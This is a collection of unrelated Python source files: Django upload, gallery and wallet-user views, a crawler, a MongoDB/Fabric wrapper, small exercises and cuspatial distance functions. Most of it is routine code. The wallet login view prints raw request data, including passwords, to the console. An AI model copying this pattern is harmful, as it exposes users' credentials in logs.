| 2021-08-09T15:23:07.714662
| 2017-11-12T07:53:21
| 2017-11-12T07:53:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,992
|
py
|
'''
class-name LocalUploader
The LocalUploader class stores uploaded files on the server.
It provides methods for uploading, viewing, updating and deleting files on the server.
'''
class LocalUploader(object):
##
# To Upload Multiple Files onto the Server
# @param request object
# @return list[Uploads-model-object]
##
def upload(self, request):
import os
from models import Uploads
from utility import get_file_details, generate_uuid
from validator import on_upload_request
from PIL import Image
if not os.path.isdir(os.environ['UPLOAD_FOLDER']):
os.mkdir(os.environ['UPLOAD_FOLDER'])
on_upload_request(request)
files = request.FILES.getlist('files[]')
upload_response = []
for file in files:
file_detail = get_file_details(file, request)
pil_image = Image.open(file, 'r')
pil_image.save(os.path.join(os.environ['UPLOAD_FOLDER'], file_detail['local_name']), pil_image.format, quality=70)
upload = Uploads(**file_detail).save()
if upload:
upload_response.append(upload)
return upload_response
##
# To View a file using the SelfLink, which is provided when user uploads a file
# @param request object
# @return file
##
def accessFile(self, request, filename):
import os
from validator import on_upload_access_request
from utility import load_file, get_mime_from_path
if not os.path.isdir(os.environ['UPLOAD_FOLDER']):
os.mkdir(os.environ['UPLOAD_FOLDER'])
on_upload_access_request(filename)
filepath = os.path.join(os.environ['UPLOAD_FOLDER'], filename)
return load_file(filepath), get_mime_from_path(filepath)
##
# To update a file with another using upload-id
# A file can only be updated by the owner of the file.
# @param request object, upload-id
# @return Uploads-model-object
##
def update(self, request, upload_id):
from validator import on_upload_update_request
from models import Uploads
from utility import get_file_details
from PIL import Image
import os
on_upload_update_request(request, upload_id)
file = request.FILES['files[]']
file_detail = get_file_details(file, request, upload_id)
pil_image = Image.open(file, 'r')
pil_image.save(os.path.join(os.environ['UPLOAD_FOLDER'], file_detail['local_name']), pil_image.format, quality=70)
return Uploads.manager.filterUpload({'id':upload_id})[0]
##
# To delete a file with using upload-id
# A file can only be deleted by the owner of the file.
# @param request object, upload-id
# @return bool
##
def delete(self, request, upload_id):
from models import Uploads
from utility import delete_file, auth
upload = Uploads.manager.filterUpload({'id':upload_id, 'user_id':auth(request).id})
if len(upload):
delete_file(upload[0].path)
return upload[0].delete()
else:
from upload_service.middleware.exception.NotFoundException import NotFoundException
raise NotFoundException(params={'upload-id'}, payload=(['hint','Please provide a valid upload id'],))
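# Hypothetical usage from a Django view (names shown only for illustration; the request
# object and upload ids come from the surrounding project, not this module):
# uploader = LocalUploader()
# uploads = uploader.upload(request)                        # store every file in request.FILES['files[]']
# body, mime = uploader.accessFile(request, "<local_name>") # stream a stored file back
# uploader.delete(request, uploads[0].id)                   # owner-only delete by upload id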
|
[
"ankurmishra0113@gmail.com"
] |
ankurmishra0113@gmail.com
|
e364df9ca876ec4a9c08bd80bc41c32c299fef9e
|
0212052f3e8be319130986845f41e140598a21ac
|
/Gallery/main/models.py
|
1bde24eaf65121f9f70869ac71560d07a6a964cd
|
[] |
no_license
|
keerthi-aluvala/Gallery
|
59bcfc89b588937224bdb86cb25c96f38f82761c
|
1eecccca9b3fdcd8448756ce2c20b438c814ede9
|
refs/heads/master
| 2023-07-28T16:23:59.976639
| 2021-09-15T10:09:33
| 2021-09-15T10:09:33
| 406,399,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
from django.db import models
from django.db.models import Model
from django.urls import reverse
class post(models.Model):
ImgName = models.CharField(max_length=100)
ImgURL = models.URLField(max_length = 200)
ImgDetails = models.TextField()
def __str__(self):
return self.ImgName
def get_absolute_url(self):
return reverse('post-detail',kwargs={'pk': self.pk})
|
[
"keerthialuvala7@gmail.com"
] |
keerthialuvala7@gmail.com
|
acdda252484cb17888b94d4969ee876e1f3b628e
|
48025a7707c346e1d101d2cc6254b3d7fbcdbbc2
|
/users/views.py
|
70636e5fda39403e7a71fda2090c26ed78afc794
|
[] |
no_license
|
pratikgupta222/wallet_management
|
144a00062406c4906c3b1519a4015924ba7d021d
|
eaa14cb289ba8e2b1c9e3630ab6f1aab7d7acf04
|
refs/heads/master
| 2020-04-25T05:11:48.520580
| 2019-03-06T23:19:09
| 2019-03-06T23:19:09
| 172,534,547
| 1
| 0
| null | 2019-03-06T23:19:10
| 2019-02-25T15:43:04
|
Python
|
UTF-8
|
Python
| false
| false
| 4,288
|
py
|
from django.db import transaction
from rest_framework import status, views
from rest_framework.authentication import BasicAuthentication
from rest_framework.permissions import IsAuthenticated, AllowAny
from rest_framework.response import Response
from users.models import User
from users.helpers import *
from users.permissions import CsrfExemptSessionAuthentication
from wallet.helpers import create_wallet_for_user
# Create your views here.
class UserLogin(views.APIView):
"""
User Authentication to be done here and the response with the
user token to be provided.
"""
authentication_classes = (
CsrfExemptSessionAuthentication, BasicAuthentication)
permission_classes = (AllowAny,)
def post(self, request):
data = request.data
print("This is the data : ", data)
email = data.get("email").strip()
password = data.get("password").strip()
login_response = User.objects.do_login(
request=request, email=email, password=password)
if login_response.status_code == status.HTTP_200_OK:
user = login_response.data.get('user')
token = login_response.data.get('token')
response = {
'status': True,
'message': {
'name': user.name,
'email': user.email,
'mAuthToken': token,
}
}
return Response(status=status.HTTP_200_OK, data=response, content_type='text/html; charset=utf-8')
response = {
'text': login_response.data
}
return Response(status=login_response.status_code, data=response, content_type='text/html; charset=utf-8')
class UserSignup(views.APIView):
"""
Registration of the new user for accessing the wallet
"""
permission_classes = (AllowAny,)
authentication_classes = (
CsrfExemptSessionAuthentication, BasicAuthentication)
def post(self, request):
"""
Creating the new user along with the wallet
:param request: A dict of the format
{
"email": "xyz@gmail.com",
"password": "1234",
"phone": "7867898798",
"name": "xyz"
}
:return: Below is the response if provided with valid request
{
'name': 'Name of the user',
'email': 'email of the user',
'mAuthToken': 'authorization token',
}
"""
data = request.data
response = {
'status': False,
'message': {
'text': '',
}
}
try:
data = validate_user_data(data, response)
except ValidationError as e:
return Response(status=status.HTTP_400_BAD_REQUEST, data=e.args[0])
with transaction.atomic():
try:
user = User.objects.create_user(**data)
except Exception as e:
transaction.set_rollback(True)
response['message'] = e.args[0]
return Response(status=status.HTTP_400_BAD_REQUEST,
data=response)
login_response = User.objects.do_login(request=request, user=user)
if login_response.status_code != status.HTTP_200_OK:
transaction.set_rollback(True)
return Response(status=login_response.status_code,
data=login_response.data)
token = login_response.data.get('token')
new_wallet = create_wallet_for_user(user)
if not new_wallet.get('ret_status') == status.HTTP_201_CREATED:
transaction.set_rollback(True)
print("Transaction rollback is done before this")
return Response(status=new_wallet['ret_status'],
data=new_wallet)
response['status'] = True
response['message'] = {
'name': user.name,
'email': user.email,
'mAuthToken': token,
}
return Response(status=status.HTTP_200_OK, data=response,
content_type='text/html; charset=utf-8')
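# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration, not part of the original file).
# Shows how a client could call the signup endpoint documented above. The URL
# "http://localhost:8000/users/signup/" is an assumption; the real route is
# defined in this project's urls.py, which is not shown here.
# ---------------------------------------------------------------------------
# import requests
#
# payload = {"email": "xyz@gmail.com", "password": "1234",
#            "phone": "7867898798", "name": "xyz"}
# resp = requests.post("http://localhost:8000/users/signup/", data=payload)
# if resp.status_code == 200:
#     token = resp.json()["message"]["mAuthToken"]  # auth token for later calls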
|
[
"pratikgupta222@gmail.com"
] |
pratikgupta222@gmail.com
|
a0e23f6a3c0c9cdb18ef53bd34c776108cfea1db
|
a877e4c20c302127a1370b67bc16c30af9bcbb5c
|
/PTT_KCM_API/tests.py
|
7e940839c6f9473976b84ee0ef84d5f858c52200
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
UDICatNCHU/PTT_KCM_API
|
a727256c0561b139b041a0369218bcb1d0f9523e
|
557f4669adb80b13a61061ad9bf5d1926a476c27
|
refs/heads/master
| 2021-01-12T16:17:11.814661
| 2017-01-01T07:48:36
| 2017-01-01T07:48:36
| 71,979,578
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 529
|
py
|
from django.test import TestCase
from django.test import Client
from django.core.urlresolvers import reverse
from djangoApiDec.djangoApiDec import getJsonFromApi
import subprocess
# Create your tests here.
class ApiTestCase(TestCase):
    def setUp(self):
self.client = Client()
def test_api_works(self):
subprocess.call(['rm', '-rf', 'json'])
response = self.client.get(reverse('PTT_KCM_API:locations')+"?issue=黑特")
"""Animals that can speak are correctly identified"""
self.assertEqual(response.status_code, 200)
|
[
"davidtnfsh@gmail.com"
] |
davidtnfsh@gmail.com
|
72b2a0612ddf0ffc92368d6b3dc82a8b544faf7e
|
f32d210cde79a724d819b0e193914144ed5e99aa
|
/bin/easy_install
|
f90cc5ca7ec77f077fd653836694e0918fd27887
|
[] |
no_license
|
ojas97/Face_reco
|
7020709450fd683ccf34462357396e29e707cfaf
|
ad6638dd05b0d629a15dea8892bec942e74e4dea
|
refs/heads/master
| 2020-03-10T14:42:15.527509
| 2018-04-14T13:09:20
| 2018-04-14T13:09:20
| 129,432,896
| 0
| 1
| null | 2018-04-14T11:13:46
| 2018-04-13T17:18:43
|
Python
|
UTF-8
|
Python
| false
| false
| 271
|
#!/home/ojas/PycharmProjects/Term_Project/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ojasagarwal97@gmail.com"
] |
ojasagarwal97@gmail.com
|
|
c1a988ceb9d4927e78e0e02a15b68ff07d1ccab1
|
8032cf4330288a9d947bd0f48d13c450346ed9c9
|
/color_mongo.py
|
b32d30c29204f8ef1c25a3b34c07211e93bd935b
|
[
"Apache-2.0"
] |
permissive
|
ColorPlatform/spectrum-mvp
|
eefd16160e9e0ef38f4c9e96644201a29035a348
|
48a5fa3664a4778d60fcf8f88992e14c988548be
|
refs/heads/master
| 2022-12-14T19:42:47.208421
| 2018-12-18T10:02:45
| 2018-12-18T10:02:45
| 162,266,191
| 1
| 0
|
NOASSERTION
| 2022-12-08T01:20:21
| 2018-12-18T09:49:28
|
Python
|
UTF-8
|
Python
| false
| false
| 4,380
|
py
|
import pymongo
import json
from bson.py3compat import (_unicode)
class ColorMongo:
"""This class looks like MongoDB API, but allows only operations supported in chaincode
"""
def __init__(self, blockchain_url, database_host, database_name='WALLETSDB', collection_name='wallets'):
self.__client = pymongo.MongoClient(host='mongodb://' + database_host)
self.__database = self.__client[database_name]
self.__collection = self.__database[_unicode(collection_name)]
self.__updates = []
self.__inserts = []
self.__prestate = []
self.__session = None
self.__blockchain = Blockchain(blockchain_url)
def insert_one(self, document):
# appends documents to list of inserts
self.__inserts.append(document)
pass
def update_one(self, filter, update):
# appends update command to list of updates
# TODO Stop when called outside transaction
# Filtering only supported by "key"
# Updating is only supported by $set "value"
# Supported format: updateOne({“key”: “Vasya”}, {“$set”: {“value”: 900}})
# TODO Check parameters, fail in case of unsupported syntax
self.__updates.append({"method": "update_one", "filter": filter, "update": update})
return self.__collection.update_one(filter, update, session=self.__session)
def find_one(self, filter):
        # records the value read so it becomes part of the transaction prestate
# TODO Stop when called outside transaction
# TODO Check parameters, fail in case of unsupported syntax
# Supported format: findOne({“key”: “Petya”})
result = self.__collection.find_one(filter, session=self.__session)
self.__prestate.append(result)
return result
def start_transaction(self):
# TODO Stop when called inside transaction
self.__updates = []
self.__prestate = []
self.__session = self.__client.start_session(causal_consistency=False)
self.__session.start_transaction()
return self
def _convert_data(self):
"""Convert data from mongo-related format to chaincode supported format"""
# commands = [{"key": c["filter"]["key"], "value": c["update"]["$set"]["value"]} for c in self.__updates]
update_commands = [["wallet", "base_collection", c["filter"]["key"], "value", c["update"]["$set"]["value"]] for c in self.__updates]
insert_commands = [["wallet", "base_collection", d["key"], key, d[key]] for d in self.__inserts for key in d]
# insert_commands = [item for sublist in complex_insert_commands for item in sublist]
commands = insert_commands + update_commands
# print(commands)
# TODO Filter out Object ids from prestate
prestate = [["wallet", "base_collection", d["key"], key, d[key]] for d in self.__prestate for key in d if key != "_id"]
return {"prestate": prestate, "commands": commands}
def commit_transaction(self):
result = self.__blockchain.check_transaction(self._convert_data())
if not result:
result = 0
# We don't want changes will be persisted now in local Mongo, polling is responsible for this.
self.__session.abort_transaction()
return result
def abort_transaction(self):
self.__session.abort_transaction()
self.__session.end_session()
return
class Blockchain:
def __init__(self, url):
self.__url = url
def check_transaction(self, data):
# TODO Implement when API specification arrives (some data transformation could be needed)
# HTTP POST /updates {"updates": self.__updates, "prestate": self.__prestate}
# Now just random wait
import time
import random
from hfc.fabric import Client
import json
cli = Client(net_profile="test/fixtures/network-k8s.json")
org1_admin = cli.get_user(org_name='org1.example.com', name='Admin')
try:
print(data)
response = cli.chaincode_invoke(
requestor=org1_admin,
channel_name='businesschannel',
peer_names=['peer0.org1.example.com'],
args=[json.dumps(data)],
cc_name='example_cc_2',
cc_version='v1.0'
)
except Exception as e:
return -1
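# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration, not part of the original file).
# Shows the intended transaction flow of ColorMongo; the blockchain URL and
# Mongo host below are placeholder assumptions.
# ---------------------------------------------------------------------------
# db = ColorMongo(blockchain_url="http://localhost:7050",
#                 database_host="localhost:27017")
# tx = db.start_transaction()
# wallet = tx.find_one({"key": "Vasya"})                 # read goes into prestate
# tx.update_one({"key": "Vasya"}, {"$set": {"value": 900}})
# result = tx.commit_transaction()                       # validated via chaincode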
|
[
"a.tapekhin@gmail.com"
] |
a.tapekhin@gmail.com
|
1c37c034aa9ddf26b763e81f1d2a97817418c05d
|
6db191f44416ab051a2afeb674b8b667ace63490
|
/shellob.py
|
233fdaab05a0d812c88413765bd39e8e9937fee6
|
[] |
no_license
|
maldy/shellob
|
82a665c0576429b59ee6756d86c350ddb232ca1f
|
d139b558257ff7fc24b4b1d06ae11365ff1345a8
|
refs/heads/master
| 2020-04-06T06:55:21.288521
| 2011-10-22T11:45:53
| 2011-10-22T11:45:53
| 2,375,173
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,919
|
py
|
#!/usr/bin/env python
"""
shellob.py
! !
\._\____/_./
_._/ \_._
.-\____/-.
/ oOOo \
< >
A slightly simple webcrawler.
"""
__version__ = "0.5"
__authors__ = "maldy (lordmaldy at gmail dot com), Vishaka (vishakadatta at\
gmail dot com)"
import re
import socket
import datetime
import errno
# stuff you'll have to install - all available with python setuptools
from mechanize import Browser, HTTPError, URLError, BrowserStateError
import pymongo
mongo_host = '10.109.27.150'
mongo_port = 27017
espn_regex = re.compile(r'/football/')
fixture_regex = re.compile(r'/fixtures/')
PORT = 10000
URL_TIMEOUT = 60 #Time-out to wait for page to load
class Crawler():
def __init__(self):
self.br = Browser()
self.br.set_handle_redirect(True)
self.queue_server = {"host": "localhost", "port": PORT}
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.sock.connect((self.queue_server['host'], self.queue_server['port']))
except socket.error, (value, message):
print "Could not connect to queue server at " + self.queue_server['host'] +\
":" + str(self.queue_server['port'])
print message
return
def recv_delim(self, buf_len, delim):
data = ""
while True:
recv_data = self.sock.recv(buf_len)
data += recv_data
if delim in data:
return data[:-1]
def send_msg(self, msg, delim):
msg_len = len(msg)
bytes_sent = 0
while bytes_sent < msg_len:
sent = self.sock.send( msg + delim )
bytes_sent += sent
msg = msg[sent+1:]
return bytes_sent
def crawl(self):
while True:
# grab the next url off the queue server
buf_left = 10000
url_msg = self.recv_delim( 4096, '\0')
depth_end = url_msg.find('\1')
url = url_msg[depth_end+1:]
depth = int(url_msg[0:depth_end])
print str(datetime.datetime.utcnow()) + " URL received from queue server ->" + url +\
" Depth : " + str(depth)
# fetch url contents (filter stuff here)
try :
response = self.br.open(url,timeout=URL_TIMEOUT)
if response:
print "Crawl successful"
crawler_ack = 's'
connection = pymongo.Connection(mongo_host, mongo_port)
db = connection.final_espn_corpus
html = response.read()
post = {"url": url, "crawl_time": datetime.datetime.utcnow(), "content": html}
posts = db.pages
posts.update({"url": url},post, True)
else:
print "Crawl failed - Timeout"
crawler_ack = 'f'
except HTTPError, e:
print "Crawl failed - HTTP error"
if e.code >= 400 and e.code<= 417:
crawler_ack = 'd'
else:
crawler_ack = 'f'
except URLError:
print "Crawl failed - Could not open page"
crawler_ack = 'f'
links_found = []
            if crawler_ack == 's':
try:
links_found = list( self.br.links() )
except BrowserStateError:
print "Crawl failed - Mechanize error"
crawler_ack = 'd'
except socket.timeout:
print "Crawl failed - links() timed out"
crawler_ack = 'f'
crawler_msg = crawler_ack + "*"
depth += 1 #All links in this page are at lower depth.
for link in links_found:
if espn_regex.search(link.absolute_url) and not \
fixture_regex.search(link.absolute_url):
                    if link.absolute_url[-1] != '/':
link.absolute_url += '/'
url_msg = str(depth) + '\1' + link.absolute_url + '*'
crawler_msg += url_msg
bytes_sent = self.send_msg( crawler_msg, '\0' )
self.sock.close()
def main():
# thread and unleash shellob onto the unsuspecting site. Amok!
c = Crawler()
c.crawl()
if __name__ == "__main__":
main()
##############################
# Code Snippet dump - ignore #
##############################
"""
response = self.br.open(url)
for link in self.br.links():
print link
response.seek(0)
html = response.read()
root = lxml.html.fromstring(html)
for link in root.iterlinks():
print link
"""
|
[
"lordmaldy@gmail.com"
] |
lordmaldy@gmail.com
|
9769b68ced1dc51abf28a9414ee09acacdfb932d
|
7223690a5bf83b3fd5141fb906cf91c58ed9063c
|
/Practice/dollar.py
|
406dd91288977a12f456b24032fa0917f4f5ac46
|
[] |
no_license
|
BowwowKeye/wasteyard
|
74326059ec784b9d0ba9fbb3031e794d409dcd3e
|
4f4309dd4a46228950ddda0d333564ef27f8fa6b
|
refs/heads/master
| 2021-04-06T10:19:11.033944
| 2018-06-06T12:22:30
| 2018-06-06T12:22:30
| 124,637,011
| 0
| 0
| null | 2018-03-11T03:58:47
| 2018-03-10T08:31:47
|
Python
|
UTF-8
|
Python
| false
| false
| 280
|
py
|
total = float(input('input your money'))
# amounts below one dollar are converted to cents; anything larger is
# treated as already being given in cents
if total < 1:
    total *= 100
(quarter, total) = divmod(total, 25)
(dime, total) = divmod(total, 10)
(nickel, total) = divmod(total, 5)
(cent, total) = divmod(total, 1)
print('quarter:%d,dime:%d,nickel:%d,cent:%d' % (quarter, dime, nickel, cent))
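# Worked example (illustration only): an input of 0.87 becomes 87 cents, which
# divmod splits into 3 quarters (75), 1 dime (10), 0 nickels and 2 cents, so
# the script prints quarter:3,dime:1,nickel:0,cent:2.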
|
[
"quant.wkai@gmail.com"
] |
quant.wkai@gmail.com
|
000520180d72bddfb7d6589c47de3fce6083e0a2
|
bf593db51f9a3ef9a4cd8235466e4dd138ee61f2
|
/IT 310 - Data Structures and Algorithms/6.5.py
|
11f04298206910ee925b9d81c8a8bd8032aad2a7
|
[] |
no_license
|
TylerBade/Classwork
|
101e35d006cdf5d52079270c0f745a87a3142774
|
43ecc9b46d2d7fe604eac33ca064e9bc1c23302c
|
refs/heads/master
| 2020-03-22T04:55:15.210658
| 2018-10-22T06:53:05
| 2018-10-22T06:53:05
| 137,776,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 791
|
py
|
class Stack:
    def __init__(self):
        self._items = list()
    def isEmpty(self):
        return len(self) == 0
    def __len__(self):
        return len(self._items)
    def peek(self):
        if self.isEmpty():
            return "No values to peek at."
        else:
            return self._items[-1]
    def pop(self):
        if self.isEmpty():
            return "No values to pop."
        else:
            return self._items.pop()
    def push(self, item):
        self._items.append(item)
    def __str__(self):
        return repr(self._items)
newStack = Stack()
newStack.push(4)
newStack.push(5)
newStack.push(6)
newStack.push(10)
print(newStack)
revStack = Stack()
while not newStack.isEmpty():
    revStack.push(newStack.pop())
print(revStack)
|
[
"Tjbade@gmail.com"
] |
Tjbade@gmail.com
|
e9fdf3118d27b5e5d62637f7854d1467fe0198df
|
eec259ed9551157fc7d39759be9da014e6b56cd0
|
/python/cuspatial/cuspatial/core/spatial/distance.py
|
fa53bacee3fac90172a1d21e6206b47b279b871d
|
[
"Apache-2.0"
] |
permissive
|
rapidsai/cuspatial
|
b4699ffe73ac217ec40244e231d33675470d3e30
|
a87d21f0cf70116576bf7dbdd42db2bcfd50e7d4
|
refs/heads/branch-23.10
| 2023-08-31T10:49:25.144482
| 2023-08-30T22:02:04
| 2023-08-30T22:02:04
| 199,666,905
| 509
| 136
|
Apache-2.0
| 2023-09-08T21:07:05
| 2019-07-30T14:23:22
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 22,088
|
py
|
# Copyright (c) 2022-2023, NVIDIA CORPORATION.
import cudf
from cudf import DataFrame, Series
from cudf.core.column import as_column
from cuspatial._lib.distance import (
directed_hausdorff_distance as cpp_directed_hausdorff_distance,
haversine_distance as cpp_haversine_distance,
pairwise_linestring_distance as cpp_pairwise_linestring_distance,
pairwise_linestring_polygon_distance as c_pairwise_line_poly_dist,
pairwise_point_distance as cpp_pairwise_point_distance,
pairwise_point_linestring_distance as c_pairwise_point_linestring_distance,
pairwise_point_polygon_distance as c_pairwise_point_polygon_distance,
pairwise_polygon_distance as c_pairwise_polygon_distance,
)
from cuspatial._lib.types import CollectionType
from cuspatial.core.geoseries import GeoSeries
from cuspatial.utils.column_utils import (
contains_only_linestrings,
contains_only_multipoints,
contains_only_points,
contains_only_polygons,
)
def directed_hausdorff_distance(multipoints: GeoSeries):
"""Compute the directed Hausdorff distances between all pairs of
spaces.
Parameters
----------
multipoints: GeoSeries
A column of multipoint, where each multipoint indicates an input space
to compute its hausdorff distance to the rest of input spaces.
Returns
-------
result : cudf.DataFrame
result[i, j] indicates the hausdorff distance between multipoints[i]
and multipoint[j].
Examples
--------
The directed Hausdorff distance from one space to another is the greatest
of all the distances between any point in the first space to the closest
point in the second.
`Wikipedia <https://en.wikipedia.org/wiki/Hausdorff_distance>`_
Consider a pair of lines on a grid::
:
x
-----xyy---
:
:
x\\ :sub:`0` = (0, 0), x\\ :sub:`1` = (0, 1)
y\\ :sub:`0` = (1, 0), y\\ :sub:`1` = (2, 0)
x\\ :sub:`0` is the closest point in ``x`` to ``y``. The distance from
x\\ :sub:`0` to the farthest point in ``y`` is 2.
y\\ :sub:`0` is the closest point in ``y`` to ``x``. The distance from
y\\ :sub:`0` to the farthest point in ``x`` is 1.414.
Compute the directed hausdorff distances between a set of spaces
>>> pts = cuspatial.GeoSeries([
... MultiPoint([(0, 0), (1, 0)]),
... MultiPoint([(0, 1), (0, 2)])
... ])
>>> cuspatial.directed_hausdorff_distance(pts)
0 1
0 0.0 1.414214
1 2.0 0.000000
"""
num_spaces = len(multipoints)
if num_spaces == 0:
return DataFrame()
if not contains_only_multipoints(multipoints):
raise ValueError("Input must be a series of multipoints.")
result = cpp_directed_hausdorff_distance(
multipoints.multipoints.x._column,
multipoints.multipoints.y._column,
as_column(multipoints.multipoints.geometry_offset[:-1]),
)
return DataFrame._from_columns(result, range(num_spaces))
def haversine_distance(p1: GeoSeries, p2: GeoSeries):
"""Compute the haversine distances in kilometers between an arbitrary
list of lon/lat pairs
Parameters
----------
p1: GeoSeries
Series of points as floats
p2: GeoSeries
Series of points as floats
Returns
-------
result : cudf.Series
The distance between pairs of points between `p1` and `p2`
>>> import cudf
>>> import cuspatial
>>> a = {"latitude":[0.0,0.0,1.0,1.0],
... "longitude": [0.0,1.0,0.0,1.0]}
>>> df = cudf.DataFrame(data=a)
>>> # Create cuSpatial GeoSeries from cuDF Dataframe
>>> gs = cuspatial.GeoSeries.from_points_xy(
... df[['longitude', 'latitude']].interleave_columns()
... )
>>> # Create Comparator cuSpatial GeoSeries from a comparator point
>>> df['compare_lat'] = 2.0 # this will broadcast the value to all rows
>>> df['compare_lng'] = 2.0
>>> cmp_gs = cuspatial.GeoSeries.from_points_xy(
... df[['compare_lat', 'compare_lng']].interleave_columns()
... )
>>> # Calculate Haversine Distance of cuDF dataframe to comparator point
>>> df['compare_dist'] = cuspatial.haversine_distance(gs, cmp_gs)
>>> df.head()
latitude longitude compare_lat compare_lng compare_dist
0 0.0 0.0 2.0 2.0 314.474805
1 0.0 1.0 2.0 2.0 248.629315
2 1.0 0.0 2.0 2.0 248.568719
3 1.0 1.0 2.0 2.0 157.225432
"""
if any([not contains_only_points(p1), not contains_only_points(p2)]):
raise ValueError("Input muist be two series of points.")
if len(p1) != len(p2):
raise ValueError("Mismatch length of inputs.")
p1_lon = p1.points.x._column
p1_lat = p1.points.y._column
p2_lon = p2.points.x._column
p2_lat = p2.points.y._column
return cudf.Series._from_data(
{"None": cpp_haversine_distance(p1_lon, p1_lat, p2_lon, p2_lat)}
)
def pairwise_point_distance(points1: GeoSeries, points2: GeoSeries):
"""Compute distance between (multi)points-(multi)points pairs
Currently `points1` and `points2` must contain either only points or
multipoints. Mixing points and multipoints in the same series is
unsupported.
Parameters
----------
points1 : GeoSeries
A GeoSeries of (multi)points
points2 : GeoSeries
A GeoSeries of (multi)points
Returns
-------
distance : cudf.Series
the distance between each pair of (multi)points
Examples
--------
>>> from shapely.geometry import Point, MultiPoint
>>> p1 = cuspatial.GeoSeries([
... MultiPoint([(0.0, 0.0), (1.0, 0.0)]),
... MultiPoint([(0.0, 1.0), (1.0, 0.0)])
... ])
>>> p2 = cuspatial.GeoSeries([
... Point(2.0, 2.0), Point(0.0, 0.5)
... ])
>>> cuspatial.pairwise_point_distance(p1, p2)
0 2.236068
1 0.500000
dtype: float64
"""
if not len(points1) == len(points2):
raise ValueError("`points1` and `points2` must have the same length")
if len(points1) == 0:
return cudf.Series(dtype="float64")
if not contains_only_points(points1):
raise ValueError("`points1` array must contain only points")
if not contains_only_points(points2):
raise ValueError("`points2` array must contain only points")
if (len(points1.points.xy) > 0 and len(points1.multipoints.xy) > 0) or (
len(points2.points.xy) > 0 and len(points2.multipoints.xy) > 0
):
raise NotImplementedError(
"Mixing point and multipoint geometries is not supported"
)
(
lhs_column,
lhs_point_collection_type,
) = _extract_point_column_and_collection_type(points1)
(
rhs_column,
rhs_point_collection_type,
) = _extract_point_column_and_collection_type(points2)
return Series._from_data(
{
None: cpp_pairwise_point_distance(
lhs_point_collection_type,
rhs_point_collection_type,
lhs_column,
rhs_column,
)
}
)
def pairwise_linestring_distance(
multilinestrings1: GeoSeries, multilinestrings2: GeoSeries
):
"""Compute distance between (multi)linestring-(multi)linestring pairs
The shortest distance between two linestrings is defined as the shortest
distance between all pairs of segments of the two linestrings. If any of
the segments intersect, the distance is 0.
Parameters
----------
multilinestrings1 : GeoSeries
A GeoSeries of (multi)linestrings
multilinestrings2 : GeoSeries
A GeoSeries of (multi)linestrings
Returns
-------
distance : cudf.Series
the distance between each pair of linestrings
Examples
--------
>>> from shapely.geometry import LineString, MultiLineString
>>> ls1 = cuspatial.GeoSeries([
... LineString([(0, 0), (1, 1)]),
... LineString([(1, 0), (2, 1)])
... ])
>>> ls2 = cuspatial.GeoSeries([
... MultiLineString([
... LineString([(-1, 0), (-2, -1)]),
... LineString([(-2, -1), (-3, -2)])
... ]),
... MultiLineString([
... LineString([(0, -1), (0, -2), (0, -3)]),
... LineString([(0, -3), (-1, -3), (-2, -3)])
... ])
... ])
>>> cuspatial.pairwise_linestring_distance(ls1, ls2)
0 1.000000
1 1.414214
dtype: float64
"""
if not len(multilinestrings1) == len(multilinestrings2):
raise ValueError(
"`multilinestrings1` and `multilinestrings2` must have the same "
"length"
)
if len(multilinestrings1) == 0:
return cudf.Series(dtype="float64")
if not contains_only_linestrings(
multilinestrings1
) or not contains_only_linestrings(multilinestrings2):
raise ValueError(
"`multilinestrings1` and `multilinestrings2` must contain only "
"linestrings"
)
if len(multilinestrings1) == 0:
return cudf.Series(dtype="float64")
return Series._from_data(
{
None: cpp_pairwise_linestring_distance(
multilinestrings1.lines.column(),
multilinestrings2.lines.column(),
)
}
)
def pairwise_point_linestring_distance(
points: GeoSeries, linestrings: GeoSeries
):
"""Compute distance between (multi)points-(multi)linestrings pairs
The distance between a (multi)point and a (multi)linestring
is defined as the shortest distance between every point in the
multipoint and every line segment in the multilinestring.
This algorithm computes distance pairwise. The ith row in the result is
the distance between the ith (multi)point in `points` and the ith
(multi)linestring in `linestrings`.
Parameters
----------
points : GeoSeries
The (multi)points to compute the distance from.
linestrings : GeoSeries
The (multi)linestrings to compute the distance from.
Returns
-------
distance : cudf.Series
Notes
-----
The input `GeoSeries` must contain a single type geometry.
For example, `points` series cannot contain both points and polygons.
Currently, it is unsupported that `points` contains both points and
multipoints.
Examples
--------
**Compute distances between point array to linestring arrays**
>>> from shapely.geometry import (
... Point, MultiPoint, LineString, MultiLineString
... )
>>> import geopandas as gpd, cuspatial
>>> pts = cuspatial.from_geopandas(gpd.GeoSeries([
... Point(0.0, 0.0), Point(1.0, 1.0), Point(2.0, 2.0)
... ]))
>>> mlines = cuspatial.from_geopandas(gpd.GeoSeries(
... [
... LineString([Point(-1.0, 0.0),
... Point(-0.5, -0.5),
... Point(-1.0, -0.5),
... Point(-0.5, -1.0)]),
... LineString([Point(8.0, 10.0),
... Point(11.21, 9.48),
... Point(7.1, 12.5)]),
... LineString([Point(1.0, 0.0), Point(0.0, 1.0)]),
... ]))
>>> cuspatial.pairwise_point_linestring_distance(pts, mlines)
0 0.707107
1 11.401754
2 2.121320
dtype: float64
**Compute distances between multipoint to multilinestring arrays**
>>> # 3 pairs of multi points containing 3 points each
>>> ptsdata = [
... [[9, 7], [0, 6], [7, 2]],
... [[5, 8], [5, 7], [6, 0]],
... [[8, 8], [6, 7], [4, 1]],
... ]
>>> # 3 pairs of multi linestrings containing 2 linestrings each
>>> linesdata = [
... [
... [[86, 47], [31, 17], [84, 16], [14, 63]],
... [[14, 36], [90, 73], [72, 66], [0, 5]],
... ],
... [
... [[36, 90], [29, 31], [91, 70], [25, 78]],
... [[61, 64], [89, 20], [94, 46], [37, 44]],
